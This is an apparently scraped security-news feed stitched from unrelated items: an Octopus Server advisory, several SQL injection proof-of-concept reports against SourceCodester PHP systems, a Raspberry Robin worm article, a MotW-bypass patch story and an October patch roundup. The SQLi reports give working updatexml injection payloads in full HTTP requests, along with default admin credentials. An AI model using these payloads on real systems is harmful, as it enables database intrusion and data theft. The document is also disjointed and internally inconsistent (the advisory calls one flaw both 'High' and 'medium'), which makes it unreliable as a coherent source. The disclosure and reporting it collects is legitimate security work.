In affected versions of Octopus Server where access is managed by an external authentication provider, it was possible that the API key/keys of a disabled/deleted user were still valid after the access was revoked.

Summary

Disabled/Deleted users API keys are still usable when access is revoked via an External Auth Provider (CVE-2022-2572)

Advisory Number

2022-23

Discovery Date

29 Jul 2022

Patch Release Date

29 Sep 2022

Advisory Release Date

01 Nov 2022

Product

Octopus Server

Operating System

Linux and Microsoft Windows

Severity

High

CVE ID

CVE-2022-2572

Customers who have downloaded and installed any of the Octopus Server versions listed below ("Details") are affected.

Please upgrade your Octopus Server immediately to fix this vulnerability.

Customers who have upgraded Octopus Server to version 2022.3.10692 or higher are not affected.

**Severity**

Octopus Deploy has given this vulnerability a medium rating. This rating was given according to the Octopus Deploy severity levels, which ranks vulnerabilities as critical, high, medium, or low severity.

This is our assessment and you should evaluate its applicability to your own environment.

**Details**

In affected versions of Octopus Server where access is managed by an external authentication provider, it was possible that the API key/keys of a disabled/deleted user were still valid after the access was revoked.

The versions of Octopus Server affected by this vulnerability are:

*   All 3.x versions after 3.5
*   All 4.x versions
*   All 2018.x, 2019.x, 2020.x and 2021.x versions
*   All 2022.1.x versions before 2022.1.3264
*   All 2022.2.x versions before 2022.2.8277
*   All 2022.3.x versions before 2022.3.10586
*   All 2022.4.x versions before 2022.4.2898

As of the 27/09/2022 Octopus Server version 2022.4.x is only available on Octopus Cloud.

**Fix**

To address this vulnerability, we have released Octopus Server version:

*   2022.1.3264
*   2022.2.8277
*   2022.3.10586
*   2022.4.2898

The latest versions of Octopus Deploy products can be downloaded from https://octopus.com/downloads and previous versions can be downloaded from https://octopus.com/downloads/previous

**What You Need to Do**

Octopus Deploy recommends that you upgrade to the latest version (2022.3.10692). You can download the latest version of Octopus Server from https://octopus.com/downloads

**If you can't upgrade to the latest version (2022.3.10692):**

If you have feature version...

...then upgrade to this version

3.5 and greater

2022.1.3264 or greater

4.x, 2018.x, 2019.x, 2020.x, 2021.x

2022.1.3264 or greater

2022.1.x

2022.1.3264 or greater

2022.2.x

2022.2.8277 or greater

2022.3.x

2022.3.10586 or greater

2022.4.x

2022.4.2898 or greater

**Mitigation**

There is no known mitigation for CVE-2022-2572, it is important to upgrade to a fixed version as soon as possible.

**Support**

If you have any questions or concerns regarding this advisory, please contact our support team https://octopus.com/support.

**Exploitation and Public Announcements**

The Octopus Deploy security team is not aware of any malicious use of the vulnerability that is described in this advisory.

**Source**

This vulnerability was found by a customer of Octopus Deploy.

CVE-2022-2572: Security Advisory 2022-23

Sanitization Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /php-sms/classes/Master.php?f=delete_service.

Permalink

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: daytime

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-sms/classes/Master.php?f=delete\_service

Vulnerability location: /php-sms/classes/Master.php?f=delete\_service, id

dbname =sms\_db,length=6

\[+\] Payload: id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /php\-sms/classes/Master.php?f\=delete\_service HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/php-sms/admin/?page=services
Content-Length: 65
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close
id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-43355: bug_report/SQLi-3.md at main · daytime888/bug_report

Sanitization Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/?page=orders/manage_request.

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: daytime

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Execute the following statement to create the "request\_list" table

CREATE TABLE \`request\_list\` (
  \`id\` int(11) NOT NULL
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;
COMMIT;

Vulnerability File: /php-sms/admin/?page=orders/manage\_request&id=

Vulnerability location: /php-sms/admin/?page=orders/manage\_request&id=, id

dbname =sms\_db,length=6

\[+\] Payload: /php-sms/admin/?page=orders/manage\_request&id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /php\-sms/admin/?page\=orders/manage\_request&id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close

CVE-2022-43354: bug_report/SQLi-2.md at main · daytime888/bug_report

Sanitization Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/?page=orders/view_order.

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: daytime

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Execute the following statement to create the "order\_list" table

CREATE TABLE \`order\_list\` (
  \`id\` int(11) NOT NULL
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;
COMMIT;

Vulnerability File: /php-sms/admin/?page=orders/view\_order&id=

Vulnerability location: /php-sms/admin/?page=orders/view\_order&id=, id

dbname =sms\_db,length=6

\[+\] Payload: /php-sms/admin/?page=orders/view\_order&id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /php\-sms/admin/?page\=orders/view\_order&id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close

CVE-2022-43353: bug_report/SQLi-1.md at main · daytime888/bug_report

** UNSUPPORTED WHEN ASSIGNED ** Oracle Solaris version 10 1/13, when using the Common Desktop Environment (CDE), is vulnerable to a privilege escalation vulnerability. A low privileged user can escalate to root by crafting a malicious printer and double clicking on the the crafted printer's icon.

CVE-2022-43752: .:: Phrack Magazine ::.

Categories: News
Categories: Ransomware
Tags: Raspberry Robin

Tags:  FakeUpdates

Tags:  LockBit

Tags:  Clop

Tags:  ransomware

Microsoft warns that the Raspberry Robin worm has triggered payload alerts on devices of almost 1,000 organizations in the past 30 days and is used to introduce ransomware.



(Read more...)




The post Raspberry Robin worm used as ransomware prelude appeared first on Malwarebytes Labs.

Raspberry Robin aka Worm.RaspberyRobin started out as an annoying, yet relatively low-profile threat that was often installed via USB drive. First spotted in September 2021, it was typically introduced into a network through infected removable drives, often USB devices.

Now the worm has been found to be the foothold for more serious threats like ransomware as laid out in this Microsoft Security blog. Microsoft warns that the worm has triggered payload alerts on devices of almost 1,000 organizations in the past 30 days.

**Primary infection**

Initially, the Raspberry Robin worm often appears as a shortcut .lnk file masquerading as a legitimate folder on the infected USB device. The name of the lnk file was _recovery.lnk_ which later changed to filenames associated with the brand of the USB device. Raspberry Robin uses both autoruns to launch and social engineering to encourage users to click the LNK file.

Raspberry Robin’s LNK file points to _cmd.exe_ to launch the Windows Installer service _msiexec.exe_ and install a malicious payload hosted on compromised QNAP network attached storage (NAS) devices.

**Infrastructure**

A NAS device is a storage server connected to a computer network, storing data that can be accessed by a wide variety of devices, including Windows, macOS, and other systems. In real life this usually means they are used as an external hard-drive that can be accessed over an intranet or the internet. There are several vulnerabilities in QNAP devices for which patches are available, but unfortunately many of them remain unpatched due to unawareness.

**Backdoor**

To be able to act as a backdoor, malware needs to be active or you need to be able to trigger it remotely. Raspberry Robin gains persistence by adding itself to the RunOnce key in the CurrentUser registry hive of the user who executed the initial malware.

By using command-and-control (C2) servers hosted on Tor nodes the Raspberry Robin implant can be used to distribute other malware.

**Guests**

As an established access provider in the current malware-as-a-service landscape you can make money by selling the access to affected networks to other malware operators like ransomware groups. Microsoft found that Raspberry Robin has been used to facilitate FakeUpdates (SocGholish), Fauppod, IcedID, Bumblebee, TrueBot, LockBit, and human-operated intrusions.

Fauppod is heavily obfuscated malweare that is also used to spread FakeUpdates, and writes Raspberry Robin to USB drives. TrueBot Trojans are used in targeted attacks for reconnaissance purposes.

An example of the human-operated intrusions was the deployment of Cobalt Strike to deliver the Clop ransomware.

**Stop the worm**

In Windows, the autorun of USB drives is disabled by default. However, many organizations have widely enabled it through legacy Group Policy changes, according to Microsoft. If you enabled it, this is a policy worth re-thinking.

Owners of QNAP devices should be aware of the fact that they are not only putting their own files at risk by not applying the patches, but they are providing malware authors with a free-to-use infrastructure to victimize others.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Raspberry Robin worm used as ransomware prelude

Simple Cold Storage Management System version 1.0 suffers from a remote SQL injection vulnerability.

    # Simple Cold Storage Management System v1.0 by oretnom23 has SQL injectionBUG_Author: QiaoRui fengLogin account: admin/admin123 (Super Admin account)vendors: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.htmlThe program is built using the xmapp-php8.1 versionVulnerability File: /csms/admin/bookings/update_status.php?id=Vulnerability location: /csms/admin/bookings/update_status.php?id=, iddbname =csms_db,length=7[+] Payload: /csms/admin/bookings/update_status.php?id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id```sqlGET /csms/admin/bookings/update_status.php?id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1Host: 192.168.1.88User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Cookie: PHPSESSID=d8pesjl7i2jtmf2qddggbp7q0bConnection: close```![image](https://user-images.githubusercontent.com/54017627/191013186-8adc1c41-b13a-4d67-8590-fb6dca6d4a96.png)

Simple Cold Storage Management System 1.0 SQL Injection

An unofficial patch has been made available for an actively exploited security flaw in Microsoft Windows that makes it possible for files signed with malformed signatures to sneak past Mark-of-the-Web (MotW) protections.
The fix, released by 0patch, arrives weeks after HP Wolf Security disclosed a Magniber ransomware campaign that targets users with fake security updates which employ a

An unofficial patch has been made available for an actively exploited security flaw in Microsoft Windows that makes it possible for files signed with malformed signatures to sneak past Mark-of-the-Web (MotW) protections.

The fix, released by 0patch, arrives weeks after HP Wolf Security disclosed a Magniber ransomware campaign that targets users with fake security updates which employ a JavaScript file to proliferate the file-encrypting malware.

While files downloaded from the internet in Windows are tagged with a MotW flag to prevent unauthorized actions, it has since been found that corrupt Authenticode signatures can be used to allow the execution of arbitrary executables without any SmartScreen warning.

Authenticode is a Microsoft code-signing technology that authenticates the identity of the publisher of a particular piece of software and verifies whether the software was tampered with after it was signed and published.

"The \[JavaScript\] file actually has the MotW but still executes without a warning when opened," HP Wolf Security researcher Patrick Schläpfer noted.

_Source: Will Dormann Twitter_

"If the file has this malformed Authenticode signature, the SmartScreen and/or file-open warning dialog will be skipped," security researcher Will Dormann explained.

Now according to 0patch co-founder Mitja Kolsek, the zero-day bug is the result of SmartScreen returning an exception when parsing the malformed signature, which is incorrectly interpreted as a decision to run the program rather than trigger a warning.

Fixes for the flaw also come less than two weeks after unofficial patches were shipped for another zero-day MotW bypass flaw that came to light in July and has since come under active attack, per security researcher Kevin Beaumont.

The vulnerability, discovered by Dormann, relates to how Windows fails to set the MotW identifier to files extracted from specifically crafted .ZIP files.

"Attackers therefore understandably prefer their malicious files not being marked with MOTW; this vulnerability allows them to create a ZIP archive such that extracted malicious files will not be marked," Kolsek said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Unofficial Patch Released for New Actively Exploited Windows MotW Vulnerability

Categories: News
Tags: week in security

Tags:  weekly blog roundup

The most important and interesting computer security stories from the last week.



(Read more...)




The post A week in security (October 24 - 30) appeared first on Malwarebytes Labs.

twitter

facebook

linkedin

Youtube

instagram

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

VPN Connection

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (October 24 - 30)

Plus: Important patches from Apple, VMWare, Cisco, Zimbra, SAP, and Oracle.

Other issues fixed in October are a heap buffer overflow in WebSQL tracked as CVE-2022-3446 and a use-after-free bug in Permissions API tracked as CVE-2022-3448, Google wrote in its blog. Google also fixed two use-after-free bugs in Safe Browsing and in Peer Connection.

Google Android

The Android Security Bulletin for October includes fixes for 15 flaws in the Framework and System and 33 issues in the kernel and vendor components. One of the most concerning issues is a critical security vulnerability in the Framework component that could lead to local escalation of privilege, tracked as CVE-2022-20419. Meanwhile, a flaw in the Kernel could also lead to local escalation of privilege with no additional execution privileges needed.

None of the issues are known to have been used in attacks, but it still makes sense to check your device and update it when you can. Google has issued the update to its Pixel devices and it’s also available for the Samsung Galaxy S21 and S22 series smartphones and Galaxy S21 FE.

Cisco

Cisco has urged companies to patch two flaws in its AnyConnect Secure Mobility Client for Windows after it was confirmed the vulnerabilities are being used in attacks. Tracked as CVE-2020-3433, the first could allow an attacker with valid credentials on Windows to execute code on the affected machine with system privileges.

Meanwhile, CVE-2020-3153 could allow an attacker with valid Windows credentials to copy malicious files to arbitrary locations with system-level privileges.

The US Cybersecurity and Infrastructure Security Agency has added the Cisco flaws to its already exploited vulnerabilities catalog.

While both the Cisco flaws require the attacker to be authenticated, it’s still important to update now.

Zoom

Video conferencing service Zoom patched several issues in October, including a flaw in its Zoom client for meetings, which is marked as having a high severity with a CVSS Score of 8.8. Zoom says versions before version 5.12.2 are susceptible to a URL-parsing vulnerability tracked as CVE-2022-28763.

“If a malicious Zoom meeting URL is opened, the link may direct the user to connect to an arbitrary network address, leading to additional attacks including session takeovers,” Zoom said in a security bulletin.

Earlier in the month, Zoom alerted users that its client for meetings for macOS starting with 5.10.6 and prior to 5.12.0 contained a debugging port misconfiguration.

VMWare

Software giant VMWare has patched a serious vulnerability in its Cloud Foundation

Tracked as CVE-2021-39144. The remote code execution vulnerability via XStream open source library is rated as having a critical severity with a maximum CVSSv3 base score of 9.8. “Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation, a malicious actor can get remote code execution in the context of 'root' on the appliance,” VMWare said in an advisory.

The VMware Cloud Foundation update also addresses an XML External Entity vulnerability with a lesser CVSSv3 base score of 5.3. Tracked as CVE-2022-31678, the bug could allow an unauthenticated user to perform denial of service.

Zimbra

Software firm Zimbra has issued patches to fix an already-exploited code execution flaw that could allow an attacker to access user accounts. The issue, tracked as CVE-2022-41352, has a CVSS severity score of 9.8.

Exploitation was spotted by Rapid7 researchers, who identified signs it had been used in attacks. Zimbra initially released a workaround to fix it, but now the patch is available, you should apply it ASAP.

SAP

Enterprise software firm SAP has published 23 new and updated Security Notes in its October Patch Day. Among the most serious issues is a critical Path Traversal vulnerability in SAP Manufacturing Execution. The vulnerability affects two plugins: Work Instruction Viewer and Visual Test and Repair and has a CVSS score of 9.9.

Another issue with a CVSS score of 9.6 is an account hijacking vulnerability in the SAP Commerce login page.

Oracle

Software giant Oracle has released a whopping 370 patches as part of its quarterly security update. Oracle’s Critical Patch Update for October fixes 50 vulnerabilities rated as critical.

The update contains 37 new security patches for Oracle MySQL, 11 of which may be remotely exploitable without authentication. It also contains 24 new security patches for Oracle Financial Services Applications, 16 of which may be remotely exploitable without authentication.

Due to “the threat posed by a successful attack,” Oracle “strongly recommends” that customers apply Critical Patch Update security patches as soon as possible.

Tag

#windows